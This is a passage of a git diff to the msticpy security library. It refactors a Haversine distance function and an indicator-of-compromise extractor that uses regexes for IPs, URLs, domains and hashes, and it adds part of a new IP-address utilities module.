+) -> float:
+    """
+    Calculate the Haversine distance.
+
+    Parameters
+    ----------
+    origin : Tuple[float, float]
+        Latitude, Longitude of origin of distance measurement.
+    destination : Tuple[float, float]
+        Latitude, Longitude of origin of distance measurement.
+
+    Returns
+    -------
+    float
+        Distance in kilometers.
 
     Examples
     --------
     >>> origin = (48.1372, 11.5756)  # Munich
     >>> destination = (52.5186, 13.4083)  # Berlin
-    >>> round(distance(origin, destination), 1)
+    >>> round(geo_distance(origin, destination), 1)
     504.2
 
+    Notes
+    -----
+        Author: Martin Thoma - stackoverflow
+
     """
     orig_lat, orig_lon = origin
     dest_lat, dest_lon = destination
-    EARTH_RADIUS_KM = 6371  # km
 
     ang_dist_lat = math.radians(dest_lat - orig_lat)
     ang_dist_lon = math.radians(dest_lon - orig_lon)
-    hav_a = (math.sin(ang_dist_lat / 2) * math.sin(ang_dist_lat / 2) +
-             math.cos(math.radians(orig_lat)) * math.cos(math.radians(dest_lat)) *
-             math.sin(ang_dist_lon / 2) * math.sin(ang_dist_lon / 2))
+    hav_a = (math.sin(ang_dist_lat / 2) * math.sin(ang_dist_lat / 2)) + (
+        math.cos(math.radians(orig_lat))
+        * math.cos(math.radians(dest_lat))
+        * math.sin(ang_dist_lon / 2)
+        * math.sin(ang_dist_lon / 2)
+    )
     hav_c = 2 * math.atan2(math.sqrt(hav_a), math.sqrt(1 - hav_a))
-    return EARTH_RADIUS_KM * hav_c
+    return _EARTH_RADIUS_KM * hav_c
diff --git a/msticpy/sectools/iocextract.py b/msticpy/sectools/iocextract.py
index 0bda8a74e..a76e48698 100644
--- a/msticpy/sectools/iocextract.py
+++ b/msticpy/sectools/iocextract.py
@@ -3,29 +3,100 @@
 # Licensed under the MIT License. See License.txt in the project root for
 # license information.
 # --------------------------------------------------------------------------
-"""Module for IoCExtract class."""
+"""
+Module for IoCExtract class.
+
+Uses a set of builtin regular expressions to look for Indicator of
+Compromise (IoC) patterns. Input can be a single string or a pandas
+dataframe with one or more columns specified as input.
+
+The following types are built-in:
+
+-  IPv4 and IPv6
+-  URL
+-  DNS domain
+-  Hashes (MD5, SHA1, SHA256)
+-  Windows file paths
+-  Linux file paths (this is kind of noisy because a legal linux file
+   path can have almost any character) You can modify or add to the
+   regular expressions used at runtime.
+
+"""
 
 import re
-from collections import namedtuple, defaultdict
+from collections import defaultdict, namedtuple
+from enum import Enum
+from typing import Any, Dict, List, Set, Tuple, Union
 from urllib.parse import unquote
 
 import pandas as pd
-from .. nbtools.utility import export
-from .. _version import VERSION
+
+from .._version import VERSION
+from ..common.utility import check_kwargs, export
+from .domain_utils import DomainValidator
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
 def _compile_regex(regex):
-
     return re.compile(regex, re.I | re.X | re.M)
 
-IoCPattern = namedtuple('IoCPattern', ['ioc_type', 'comp_regex', 'priority'])
+
+IoCPattern = namedtuple("IoCPattern", ["ioc_type", "comp_regex", "priority", "group"])
+
+_RESULT_COLS = ["IoCType", "Observable", "SourceIndex", "Input"]
+
+
+@export
+class IoCType(Enum):
+    """Enumeration of IoC Types."""
+
+    # pylint: disable=invalid-name
+    unknown = "unknown"
+    ipv4 = "ipv4"
+    ipv6 = "ipv6"
+    dns = "dns"
+    url = "url"
+    md5_hash = "md5_hash"
+    sha1_hash = "sha1_hash"
+    sha256_hash = "sha256_hash"
+    file_hash = "file_hash"
+    email = "email"
+    windows_path = "windows_path"
+    linux_path = "linux_path"
+    hostname = "hostname"
+
+    # pylint: enable=invalid-name
+
+    @classmethod
+    def parse(cls, value: str) -> "IoCType":
+        """
+        Return parsed IoCType of string.
+
+        Parameters
+        ----------
+        value : str
+            Enumeration name
+
+        Returns
+        -------
+        IoCType
+            IoCType matching name or unknown if no match
+
+        """
+        try:
+            ioc_type = IoCType(value.lower())
+        except ValueError:
+            ioc_type = IoCType.unknown
+        return ioc_type
+
+
+# pylint: enable=invalid-name
 
 
 @export
-class IoCExtract(object):
+class IoCExtract:
     """
     IoC Extractor - looks for common IoC patterns in input strings.
 
@@ -53,114 +124,166 @@ class IoCExtract(object):
     possible linux path.
     """
 
-    IPV4_REGEX = r'(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})'
-    IPV6_REGEX = r'(?<![:.\w])(?:[A-F0-9]{1,4}:){7}[A-F0-9]{1,4}(?![:.\w])'
-    DNS_REGEX = r'((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){2,}[a-z]{2,63}'
-    # dns_regex = '\\b((?=[a-z0-9-]{1,63}\\.)[a-z0-9]+(-[a-z0-9]+)*\\.){2,}[a-z]{2,63}\\b'
+    IPV4_REGEX = r"(?P<ipaddress>(?:[0-9]{1,3}\.){3}[0-9]{1,3})"
+    IPV6_REGEX = r"(?<![:.\w])(?:[A-F0-9]{0,4}:){2,7}[A-F0-9]{0,4}(?![:.\w])"
+    DNS_REGEX = r"((?=[a-z0-9-]{1,63}\.)[a-z0-9]+(-[a-z0-9]+)*\.){1,126}[a-z]{2,63}"
 
-    URL_REGEX = r'''
+    URL_REGEX = r"""
             (?P<protocol>(https?|ftp|telnet|ldap|file)://)
             (?P<userinfo>([a-z0-9-._~!$&\'()*+,;=:]|%[0-9A-F]{2})*@)?
             (?P<host>([a-z0-9-._~!$&\'()*+,;=]|%[0-9A-F]{2})*)
             (:(?P<port>\d*))?
-            (/(?P<path>([^?\# ]|%[0-9A-F]{2})*/?))?
+            (/(?P<path>([^?\#"<>\s]|%[0-9A-F]{2})*/?))?
             (\?(?P<query>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?
-            (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?'''
+            (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?"""
 
-    WINPATH_REGEX = r'''
+    WINPATH_REGEX = r"""
             (?P<root>[a-z]:|\\\\[a-z0-9_.$-]+||[.]+)
             (?P<folder>\\(?:[^\/:*?"\'<>|\r\n]+\\)*)
-            (?P<file>[^\\/*?""<>|\r\n ]+)'''
+            (?P<file>[^\\/*?""<>|\r\n ]+)"""
     # Linux simplified - this ignores some legal linux paths avoid matching too much
-    # TODO - also matches URLs!
-    LXPATH_REGEX = r'''(?P<root>/+||[.]+)
+    # This also matches URLs but these should be thrown out by priority
+    # weighting since URL has a higher priority
+    LXPATH_REGEX = r"""(?P<root>/+||[.]+)
             (?P<folder>/(?:[^\\/:*?<>|\r\n]+/)*)
-            (?P<file>[^/\0<>|\r\n ]+)'''
+            (?P<file>[^/\0<>|\r\n ]+)"""
 
-    MD5_REGEX = r'(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])'
-    SHA1_REGEX = r'(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])'
-    SHA256_REGEX = r'(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])'
+    MD5_REGEX = r"(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{32})(?:$|[^A-Fa-f0-9])"
+    SHA1_REGEX = r"(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{40})(?:$|[^A-Fa-f0-9])"
+    SHA256_REGEX = r"(?:^|[^A-Fa-f0-9])(?P<hash>[A-Fa-f0-9]{64})(?:$|[^A-Fa-f0-9])"
 
-    _content_regex = {}
+    _content_regex: Dict[str, IoCPattern] = {}
 
     def __init__(self):
-        """Intialize new instance of IoCExtract."""
+        """Initialize new instance of IoCExtract."""
         # IP Addresses
-        self.add_ioc_type('ipv4', self.IPV4_REGEX, 0)
-        self.add_ioc_type('ipv6', self.IPV6_REGEX, 0)
+        self.add_ioc_type(IoCType.ipv4.name, self.IPV4_REGEX, 0, "ipaddress")
+        self.add_ioc_type(IoCType.ipv6.name, self.IPV6_REGEX, 0)
 
         # Dns Domains
-        # TODO - This also matches IP addresses
-        self.add_ioc_type('dns', self.DNS_REGEX, 1)
+        # This also matches IP addresses but IPs have higher
+        # priority both matching on the same substring will defer
+        # to the IP regex
+        self.add_ioc_type(IoCType.dns.name, self.DNS_REGEX, 1)
 
         # Http requests
-        self.add_ioc_type('url', self.URL_REGEX, 0)
+        self.add_ioc_type(IoCType.url.name, self.URL_REGEX, 0)
 
         # File paths
         # Windows
-        self.add_ioc_type('windows_path', self.WINPATH_REGEX, 2)
+        self.add_ioc_type(IoCType.windows_path.name, self.WINPATH_REGEX, 2)
 
-        self.add_ioc_type('linux_path', self.LXPATH_REGEX, 2)
+        self.add_ioc_type(IoCType.linux_path.name, self.LXPATH_REGEX, 2)
 
         # MD5, SHA1, SHA256 hashes
-        self.add_ioc_type('md5_hash', self.MD5_REGEX, 1)
-        self.add_ioc_type('sha1_hash', self.SHA1_REGEX, 1)
-        self.add_ioc_type('sha256_hash', self.SHA256_REGEX, 1)
+        self.add_ioc_type(IoCType.md5_hash.name, self.MD5_REGEX, 1, "hash")
+        self.add_ioc_type(IoCType.sha1_hash.name, self.SHA1_REGEX, 1, "hash")
+        self.add_ioc_type(IoCType.sha256_hash.name, self.SHA256_REGEX, 1, "hash")
 
-    # Public members
+        self._dom_validator = DomainValidator()
+        self._ignore_tld = False
 
-    def add_ioc_type(self, ioc_type: str, ioc_regex: str, priority: int = 0):
+    # Public members
+    def add_ioc_type(
+        self, ioc_type: str, ioc_regex: str, priority: int = 0, group: str = None
+    ):
         """
         Add an IoC type and regular expression to use to the built-in set.
 
-        Note: adding an ioc_type that exists in the internal set will overwrite that item
-        Regular expressions are compiled with re.I | re.X | re.M (Ignore case, Verbose
-        and MultiLine)
-            :param: ioc_type - a unique name for the IoC type
-            :param: ioc_regex - a regular expression used to search for the type
-            :type ioc_type: str
-            :type ioc_regex: str
+        Parameters
+        ----------
+        ioc_type : str
+            A unique name for the IoC type
+        ioc_regex : str
+            A regular expression used to search for the type
+        priority : int, optional
+            Priority of the regex match vs. other ioc_patterns. 0 is
+            the highest priority (the default is 0).
+        group : str, optional
+            The regex group to match (the default is None,
+            which will match on the whole expression)
+
+        Notes
+        -----
+        Pattern priorities.
+            If two IocType patterns match on the same substring, the matched
+            substring is assigned to the pattern/IocType with the highest
+            priority. E.g. `foo.bar.com` will match types: `dns`, `windows_path`
+            and `linux_path` but since `dns` has a higher priority, the expression
+            is assigned to the `dns` matches.
+
         """
         if ioc_type is None or ioc_type.strip() is None:
-            raise Exception('No value supplied for ioc_type parameter')
+            raise Exception("No value supplied for ioc_type parameter")
         if ioc_regex is None or ioc_regex.strip() is None:
-            raise Exception('No value supplied for ioc_regex parameter')
+            raise Exception("No value supplied for ioc_regex parameter")
 
-        self._content_regex[ioc_type] = IoCPattern(ioc_type=ioc_type,
-                                                   comp_regex=_compile_regex(regex=ioc_regex),
-                                                   priority=priority)
+        self._content_regex[ioc_type] = IoCPattern(
+            ioc_type=ioc_type,
+            comp_regex=_compile_regex(regex=ioc_regex),
+            priority=priority,
+            group=group,
+        )
 
     @property
     def ioc_types(self) -> dict:
         """
         Return the current set of IoC types and regular expressions.
 
-            :rtype: dict of IoC Type names and regular expressions
+        Returns
+        -------
+        dict
+            dict of IoC Type names and regular expressions
+
         """
         return self._content_regex
 
-    def extract(self, src: str = None, data: pd.DataFrame = None,
-                columns: list = None, os_family='Windows',
-                ioc_types: list = None):
+    # pylint: disable=too-many-locals
+    def extract(
+        self,
+        src: str = None,
+        data: pd.DataFrame = None,
+        columns: List[str] = None,
+        **kwargs,
+    ) -> Union[Dict[str, Set[str]], pd.DataFrame]:
         """
         Extract IoCs from either a string or pandas DataFrame.
 
-        Keyword Arguments:
-            src {str} --  source string in which to look for IoC patterns
-                (default: {None})
-            data {pd.DataFrame} -- input DataFrame from which to read source strings
-                 (default: {None})
-            columns {list} -- The list of columns to use as source strings,
-                if the data parameter is used.  (default: {None})
-            os_family {str} -- 'Linux' or 'Windows' (default: {'Windows'})
-            ioc_types {list({str})} -- Restrict matching to just specified
-                types (default: {None})
-
-
-        Returns:
+        Parameters
+        ----------
+        src : str, optional
+            source string in which to look for IoC patterns
+            (the default is None)
+        data : pd.DataFrame, optional
+            input DataFrame from which to read source strings
+            (the default is None)
+        columns : list, optional
+            The list of columns to use as source strings,
+            if the `data` parameter is used. (the default is None)
+
+        Other Parameters
+        ----------------
+        ioc_types : list, optional
+            Restrict matching to just specified types.
+            (default is all types)
+        include_paths : bool, optional
+            Whether to include path matches (which can be noisy)
+            (the default is false - excludes 'windows_path'
+            and 'linux_path'). If `ioc_types` is specified
+            this parameter is ignored.
+        ignore_tlds : bool, optional
+            If True, ignore the official Top Level Domains
+            list when determining whether a domain name is
+            a legal domain.
+
+        Returns
+        -------
+        Any
             dict of found observables (if input is a string) or
             DataFrame of observables
 
+        Notes
+        -----
         Extract takes either a string or a pandas DataFrame as input.
         When using the string option as an input extract will
         return a dictionary of results.
@@ -171,102 +294,380 @@ def extract(self, src: str = None, data: pd.DataFrame = None,
         - SourceIndex: the index of the row in the input DataFrame from
         which the source for the IoC observable was extracted.
 
+        IoCType Pattern selection
+        The default list is:  ['ipv4', 'ipv6', 'dns', 'url',
+        'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
+        user-defined types.
+        'windows_path', 'linux_path' are excluded unless `include_paths`
+        is True or explicitly included in `ioc_paths`.
+
         """
+        check_kwargs(kwargs, ["ioc_types", "include_paths", "ignore_tlds"])
+        ioc_types = kwargs.get("ioc_types", None)
+        include_paths = kwargs.get("include_paths", False)
+        ignore_tld_current = self._ignore_tld
+        self._ignore_tld = kwargs.get("ignore_tlds", False)
+
         if src and src.strip():
-            return self._scan_for_iocs(src, os_family)
+            return self._scan_for_iocs(src=src, ioc_types=ioc_types)
 
         if data is None:
-            raise Exception('No source data was supplied to extract')
-
-        # Handle DataFrame option
-        assert isinstance(data, pd.DataFrame)
+            raise Exception("No source data was supplied to extract")
 
         if columns is None:
+            raise Exception("No values were supplied for the columns parameter")
+
+        ioc_types_to_use = self._get_ioc_types_to_use(ioc_types, include_paths)
+
+        col_set = set(columns)
+        if col_set > set(data.columns):
+            missing_cols = [elem for elem in col_set if elem not in data.columns]
             raise Exception(
-                'No values where supplied for the columns parameter')
+                f"Source column(s) {', '.join(missing_cols)} not found",
+                " in supplied DataFrame",
+            )
+
+        result_rows: List[pd.Series] = []
+        for idx, datarow in data.iterrows():
+            result_rows.extend(
+                self._search_in_row(datarow, idx, columns, ioc_types_to_use)
+            )
+        self._ignore_tld = ignore_tld_current
+        return pd.DataFrame(data=result_rows, columns=_RESULT_COLS)
+
+    # pylint: disable=too-many-arguments
+    def _search_in_row(
+        self,
+        datarow: pd.Series,
+        idx: Any,
+        columns: List[str],
+        ioc_types_to_use: List[str],
+    ) -> List[pd.Series]:
+        """Return results for a single input row."""
+        result_rows = []
+        for col in columns:
+            ioc_results = self._scan_for_iocs(datarow[col], ioc_types_to_use)
+            for result_type, result_set in ioc_results.items():
+                if result_set:
+                    for observable in result_set:
+                        result_row = pd.Series(
+                            data=[result_type, observable, idx, datarow[col]],
+                            index=_RESULT_COLS,
+                        )
+                        result_rows.append(result_row)
+        return result_rows
+
+    def extract_df(
+        self, data: pd.DataFrame, columns: Union[str, List[str]], **kwargs
+    ) -> pd.DataFrame:
+        """
+        Extract IoCs from either a pandas DataFrame.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            input DataFrame from which to read source strings
+        columns : Union[str, list]
+            A single column name as a string or a
+            a list of columns to use as source strings,
+
+        Other Parameters
+        ----------------
+        ioc_types : list, optional
+            Restrict matching to just specified types.
+            (default is all types)
+        include_paths : bool, optional
+            Whether to include path matches (which can be noisy)
+            (the default is false - excludes 'windows_path'
+            and 'linux_path'). If `ioc_types` is specified
+            this parameter is ignored.
+        ignore_tlds : bool, optional
+            If True, ignore the official Top Level Domains
+            list when determining whether a domain name is
+            a legal domain.
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of observables
+
+        Notes
+        -----
+        Extract takes a pandas DataFrame as input.
+        The results will be returned as a new
+        DataFrame with the following columns:
+        - IoCType: the mnemonic used to distinguish different IoC Types
+        - Observable: the actual value of the observable
+        - SourceIndex: the index of the row in the input DataFrame from
+        which the source for the IoC observable was extracted.
 
+        IoCType Pattern selection
+        The default list is:  ['ipv4', 'ipv6', 'dns', 'url',
+        'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
+        user-defined types.
+        'windows_path', 'linux_path' are excluded unless `include_paths`
+        is True or explicitly included in `ioc_paths`.
+
+        """
+        check_kwargs(kwargs, ["ioc_types", "include_paths", "ignore_tlds"])
+        ioc_types = kwargs.get("ioc_types", None)
+        include_paths = kwargs.get("include_paths", False)
+        ignore_tld_current = self._ignore_tld
+        self._ignore_tld = kwargs.get("ignore_tlds", False)
+
+        ioc_types_to_use = self._get_ioc_types_to_use(ioc_types, include_paths)
+        if isinstance(columns, str):
+            columns = [columns]
         col_set = set(columns)
-        if not col_set <= set(data.columns):
-            missing_cols = [elem for elem in col_set if elem not in data.colums]
-            raise Exception('Source column(s) {} not found in supplied DataFrame'
-                            .format(', '.join(missing_cols)))
+        if col_set > set(data.columns):
+            missing_cols = [elem for elem in col_set if elem not in data.columns]
+            raise Exception(
+                f"Source column(s) {', '.join(missing_cols)} not found",
+                " in supplied DataFrame",
+            )
 
-        result_columns = ['IoCType', 'Observable', 'SourceIndex']
-        result_frame = pd.DataFrame(columns=result_columns)
+        result_rows = []
         for idx, datarow in data.iterrows():
-            for col in columns:
-                ioc_results = self._scan_for_iocs(datarow[col], os_family, ioc_types)
-                for result_type, result_set in ioc_results.items():
-                    if result_set:
-                        for observable in result_set:
-                            result_row = pd.Series(
-                                data=[result_type, observable, idx], index=result_columns)
-                            result_frame = result_frame.append(
-                                result_row, ignore_index=True)
-
-        return result_frame
-
-    def validate(self, input_str: str, ioc_type: str) -> bool:
+            result_rows.extend(
+                self._search_in_row(datarow, idx, columns, ioc_types_to_use)
+            )
+        self._ignore_tld = ignore_tld_current
+        return pd.DataFrame(data=result_rows, columns=_RESULT_COLS)
+
+    def _get_ioc_types_to_use(
+        self, ioc_types: List[str], include_paths: bool
+    ) -> List[str]:
+        # Use only requested IoC Type patterns
+        if ioc_types:
+            ioc_types_to_use = list(set(ioc_types))
+        else:
+            ioc_types_to_use = list(set(self._content_regex.keys()))
+            # don't include linux paths unless explicitly included
+            ioc_types_to_use.remove(IoCType.linux_path.name)
+            if not include_paths:
+                # windows path matching is less noisy
+                ioc_types_to_use.remove(IoCType.windows_path.name)
+        return ioc_types_to_use
+
+    def validate(
+        self, input_str: str, ioc_type: str, ignore_tlds: bool = False
+    ) -> bool:
+        """
+        Check that `input_str` matches the regex for the specificed `ioc_type`.
+
+        Parameters
+        ----------
+        input_str : str
+            the string to test
+        ioc_type : str
+            the regex pattern to use
+        ignore_tlds : bool, optional
+            If True, ignore the official Top Level Domains
+            list when determining whether a domain name is
+            a legal domain.
+
+        Returns
+        -------
+        bool
+            True if match.
+
+        """
+        ignore_tld_current = self._ignore_tld
+        self._ignore_tld = ignore_tlds
+        if ioc_type == IoCType.file_hash.name:
+            val_type = self.file_hash_type(input_str).name
+        elif ioc_type == IoCType.hostname.name:
+            val_type = "dns"
+        else:
+            val_type = ioc_type
+        if val_type not in self._content_regex:
+            raise KeyError(
+                f"Unknown type {ioc_type}.",
+                f"Valid types are: {list(self._content_regex.keys())}",
+            )
+        rgx = self._content_regex[val_type]
+        pattern_match = rgx.comp_regex.fullmatch(input_str)
+        validated = self._validate_tld(input_str) if val_type == "dns" else True
+        self._ignore_tld = ignore_tld_current
+        return pattern_match and validated
+
+    @staticmethod
+    def file_hash_type(file_hash: str) -> IoCType:
+        """
+        Return specific IoCType based on hash length.
+
+        Parameters
+        ----------
+        file_hash : str
+            File hash string
+
+        Returns
+        -------
+        IoCType
+            Specific hash type or unknown.
+
+        """
+        hashsize_map = {
+            32: IoCType.md5_hash,
+            40: IoCType.sha1_hash,
+            64: IoCType.sha256_hash,
+        }
+        hashsize = len(file_hash.strip())
+        return hashsize_map.get(hashsize, IoCType.unknown)
+
+    def get_ioc_type(self, observable: str) -> str:
         """
-        Return true if the input_str matches the corresponding regex.
+        Return first matching type.
 
-        Arguments:
-            :input_str str: the string to test
-            :ioc_type str: the regex pattern to use
+        Parameters
+        ----------
+        observable : str
+            The IoC Observable to check
 
-        Returns:
-            bool - True if match.
+        Returns
+        -------
+        str
+            The IoC type enumeration (unknown, if no match)
 
         """
-        if ioc_type not in self._content_regex:
-            raise KeyError('Unknown type {}. Valid types are: {}'
-                           .format(ioc_type, list(self._content_regex.keys())))
-        rgx = self._content_regex[ioc_type]
-        return rgx.comp_regex.fullmatch(input_str) is not None
+        results = self._scan_for_iocs(src=observable)
+
+        if not results:
+            results = self._scan_for_iocs(
+                src=observable, ioc_types=[IoCType.linux_path.name]
+            )
+        if not results:
+            return IoCType.unknown.name
+
+        # we need to select the type that is an exact match for the whole
+        # observable string (_scan_for_iocs will return matching substrings)
+        for ioc_type, match_set in results.items():
+            if observable in match_set:
+                return ioc_type
+
+        return IoCType.unknown.name
 
     # Private methods
-    def _scan_for_iocs(self, src: str, os_family: str, ioc_types: list = None) -> dict:
+    def _validate_tld(self, domain: str) -> bool:
+        """If validate TLDS check with TLD list."""
+        if self._ignore_tld:
+            return True
+        return self._dom_validator.validate_tld(domain)
+
+    def _scan_for_iocs(
+        self, src: str, ioc_types: List[str] = None
+    ) -> Dict[str, Set[str]]:
         """Return IoCs found in the string."""
-        ioc_results = defaultdict(set)
-        iocs_found = {}
+        ioc_results: Dict[str, Set] = defaultdict(set)
+        iocs_found: Dict[str, Tuple[str, int]] = {}
 
+        # pylint: disable=too-many-nested-blocks
         for (ioc_type, rgx_def) in self._content_regex.items():
             if ioc_types and ioc_type not in ioc_types:
                 continue
 
-            if os_family == 'Linux' and rgx_def.ioc_type == 'windows_path':
-                continue
-            elif os_family == 'Windows' and rgx_def.ioc_type == 'linux_path':
-                continue
-
             match_pos = 0
             for rgx_match in rgx_def.comp_regex.finditer(src, match_pos):
-                if rgx_match is not None:
-                    self._add_highest_pri_match(iocs_found,
-                                                rgx_match.group(),
-                                                rgx_def)
-                    if ioc_type == 'url':
-                        decoded_url = unquote(rgx_match.group())
-                        for url_match in rgx_def.comp_regex.finditer(decoded_url, match_pos):
-                            if url_match is not None:
-                                self._add_highest_pri_match(iocs_found,
-                                                            url_match.group(),
-                                                            rgx_def)
-                                self._add_highest_pri_match(iocs_found,
-                                                            url_match.groupdict()['host'],
-                                                            self._content_regex['dns'])
-                    match_pos = rgx_match.end()
-                else:
+                if rgx_match is None:
                     break
+                # If the rgx_def names a group to match on, use that
+                match_str = (
+                    rgx_match.groupdict()[rgx_def.group]
+                    if rgx_def.group
+                    else rgx_match.group()
+                )
+
+                if ioc_type == "dns" and not self._validate_tld(match_str):
+                    continue
+
+                self._add_highest_pri_match(iocs_found, match_str, rgx_def)
+                if ioc_type == "url":
+                    self._check_decode_url(match_str, rgx_def, match_pos, iocs_found)
+                match_pos = rgx_match.end()
+
         for ioc, ioc_result in iocs_found.items():
             ioc_results[ioc_result[0]].add(ioc)
 
         return ioc_results
 
-    def _add_highest_pri_match(self, iocs_found: dict, current_match: str, current_def: IoCPattern):
+    def _check_decode_url(self, match_str, rgx_def, match_pos, iocs_found):
+        """Get any other IoCs from decoded URL."""
+        decoded_url = unquote(match_str)
+        for url_match in rgx_def.comp_regex.finditer(decoded_url, match_pos):
+            if url_match is not None:
+                self._add_highest_pri_match(iocs_found, url_match.group(), rgx_def)
+                self._add_highest_pri_match(
+                    iocs_found,
+                    url_match.groupdict()["host"],
+                    self._content_regex["dns"],
+                )
+
+    @staticmethod
+    def _add_highest_pri_match(
+        iocs_found: dict, current_match: str, current_def: IoCPattern
+    ):
         # if we already found a match for this item and the previous
         # ioc type is more specific then don't add this to the results
-        if current_match in iocs_found and current_def.priority > iocs_found[current_match][1]:
+        if (
+            current_match in iocs_found
+            and current_def.priority >= iocs_found[current_match][1]
+        ):
             return
-        else:
-            iocs_found[current_match] = (current_def.ioc_type, current_def.priority)
+
+        iocs_found[current_match] = (current_def.ioc_type, current_def.priority)
+
+
+# pylint: disable=too-few-public-methods
+@pd.api.extensions.register_dataframe_accessor("mp_ioc")
+class IoCExtractAccessor:
+    """Pandas api extension for IoC Extractor."""
+
+    def __init__(self, pandas_obj):
+        """Instantiate pandas extension class."""
+        self._df = pandas_obj
+        self._ioc = IoCExtract()
+
+    def extract(self, columns, **kwargs):
+        """
+        Extract IoCs from either a pandas DataFrame.
+
+        Parameters
+        ----------
+        columns : list
+            The list of columns to use as source strings,
+
+        Other Parameters
+        ----------------
+        ioc_types : list, optional
+            Restrict matching to just specified types.
+            (default is all types)
+        include_paths : bool, optional
+            Whether to include path matches (which can be noisy)
+            (the default is false - excludes 'windows_path'
+            and 'linux_path'). If `ioc_types` is specified
+            this parameter is ignored.
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of observables
+
+        Notes
+        -----
+        Extract takes a pandas DataFrame as input.
+        The results will be returned as a new
+        DataFrame with the following columns:
+        - IoCType: the mnemonic used to distinguish different IoC Types
+        - Observable: the actual value of the observable
+        - SourceIndex: the index of the row in the input DataFrame from
+        which the source for the IoC observable was extracted.
+
+        IoCType Pattern selection
+        The default list is:  ['ipv4', 'ipv6', 'dns', 'url',
+        'md5_hash', 'sha1_hash', 'sha256_hash'] plus any
+        user-defined types.
+        'windows_path', 'linux_path' are excluded unless `include_paths`
+        is True or explicitly included in `ioc_paths`.
+
+        """
+        return self._ioc.extract_df(data=self._df, columns=columns, **kwargs)
diff --git a/msticpy/sectools/ip_utils.py b/msticpy/sectools/ip_utils.py
new file mode 100644
index 000000000..cb31bd2fc
--- /dev/null
+++ b/msticpy/sectools/ip_utils.py
@@ -0,0 +1,384 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+ip_utils - IP Address functions.
+
+Contains a series of functions required to manipulate and enrich IP Address data
+to assist investigations.
+
+Designed to support any data source containing IP address entity.
+
+"""
+import ipaddress
+from functools import lru_cache
+from typing import Callable, List, Optional, Set, Tuple
+
+import pandas as pd
+from deprecated.sphinx import deprecated
+from ipwhois import (
+    ASNRegistryError,
+    HostLookupError,
+    HTTPLookupError,
+    HTTPRateLimitError,
+    IPWhois,
+    WhoisLookupError,
+    WhoisRateLimitError,
+)
+
+from .._version import VERSION
+from ..common.utility import arg_to_list, export
+from ..datamodel.entities import GeoLocation, IpAddress
+from .geoip import GeoLiteLookup
+
+__version__ = VERSION
+__author__ = "Ashwin Patil"
+
+
+class Error(Exception):
+    """Base class for other exceptions."""
+
+
+class DataError(Error):
+    """Raised when thereis a data input error."""
+
+
+def _get_geolite_lookup() -> Callable:
+    """Closure for instantiating GeoLiteLookup."""
+    geo_ip = None
+
+    def _get_geo_ip(**kwargs) -> GeoLiteLookup:
+        nonlocal geo_ip
+        if geo_ip is None:
+            geo_ip = GeoLiteLookup(**kwargs)
+        return geo_ip
+
+    return _get_geo_ip
+
+
+_GET_IP_LOOKUP = _get_geolite_lookup()
+
+
+def convert_to_ip_entities(  # noqa: MC0001
+    ip_str: Optional[str] = None,
+    data: Optional[pd.DataFrame] = None,
+    ip_col: Optional[str] = None,
+    geo_lookup: bool = True,
+) -> List[IpAddress]:
+    """
+    Take in an IP Address string and converts it to an IP Entity.
+
+    Parameters
+    ----------
+    ip_str : str
+        A string with a single IP Address or multiple addresses
+        delimited by comma or space
+    data : pd.DataFrame
+        Use DataFrame as input
+    ip_col : str
+        Column containing IP addresses
+    geo_lookup : bool
+        If true, do geolocation lookup on IPs,
+        by default, True
+
+    Returns
+    -------
+    List
+        The populated IP entities including address and geo-location
+
+    Raises
+    ------
+    ValueError
+        If neither ip_string or data/column provided as input
+
+    """
+    ip_entities: List[IpAddress] = []
+    all_ips: Set[str] = set()
+
+    if geo_lookup:
+        ip_lookup = _GET_IP_LOOKUP()
+    if ip_str:
+        addrs = arg_to_list(ip_str)
+    elif data is not None and ip_col:
+        addrs = data[ip_col].values
+    else:
+        raise ValueError("Must specify either ip_str or data + ip_col parameters.")
+
+    for addr in addrs:
+        if isinstance(addr, list):
+            ip_list = set(addr)
+        elif isinstance(addr, str) and "," in addr:
+            ip_list = {ip.strip() for ip in addr.split(",")}
+        else:
+            ip_list = {addr}
+        ip_list = ip_list - all_ips  # remove IP addresses we've seen
+        ip_entities.extend(IpAddress(Address=ip) for ip in ip_list)
+        all_ips |= ip_list
+        if geo_lookup:
+            for ip_ent in ip_entities:
+                try:
+                    ip_lookup.lookup_ip(ip_entity=ip_ent)
+                except DataError:
+                    pass
+    return ip_entities
+
+
+@export  # noqa: MC0001
+# pylint: disable=too-many-return-statements, invalid-name
+def get_ip_type(ip: str = None, ip_str: str = None) -> str:  # noqa: MC0001
+    """
+    Validate value is an IP address and determine IPType category.
+
+    (IPAddress category is e.g. Private/Public/Multicast).
+
+    Parameters
+    ----------
+    ip : str
+        The string of the IP Address
+    ip_str : str
+        The string of the IP Address - alias for `ip`
+
+    Returns
+    -------
+    str
+        Returns ip type string using ip address module
+
+    """
+    ip_str = ip or ip_str
+    if not ip_str:
+        raise ValueError("'ip' or 'ip_str' value must be specified")
+    try:
+        ipaddress.ip_address(ip_str)
+    except ValueError:
+        print(f"{ip_str} does not appear to be an IPv4 or IPv6 address")
+    else:
+        if ipaddress.ip_address(ip_str).is_multicast:
+            return "Multicast"
